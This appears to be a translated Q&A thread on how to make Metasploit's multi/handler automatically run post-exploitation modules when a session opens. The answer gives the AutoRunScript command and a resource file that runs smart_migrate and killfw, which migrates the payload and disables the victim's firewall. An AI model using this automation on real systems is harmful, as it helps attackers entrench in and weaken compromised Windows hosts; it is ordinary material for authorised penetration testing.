¿Metasploit la ejecución automática del módulo en la recepción de shell?

2

Después de leer un par de páginas web que se refieren a metasploit, me topé con una publicación que se refiere a la ejecución automática de módulos de metasploit al recibir un shell. A saber, el módulo de explotación posterior, migración inteligente.

¿Hay alguna forma de que pueda cambiar cualquier archivo de configuración para que esto suceda?

¡Gracias por toda tu ayuda!

    
pregunta James Fox 28.09.2015 - 09:37
fuente

1 respuesta

2

El controlador tiene una opción de AutoRunScript que especifica qué sucede cuando se recibe una sesión. Puede asignarle el script multi_console_command, que podrá ejecutar múltiples módulos posteriores y scripts de meterpreter al recibir la sesión.

Por ejemplo, para ejecutar los módulos smart_migrate y killfw post:

msf > use exploit/multi/handler
msf (handler) > set AutoRunScript multi_console_command -rc /root/mycommands.rb

El contenido de /root/mycommands.rb incluye:

root@kali# cat /root/mycommands.rb
run post/windows/manage/smart_migrate
run post/windows/manage/killfw
    
respondido por el void_in 28.09.2015 - 11:25
fuente

Lea otras preguntas en las etiquetas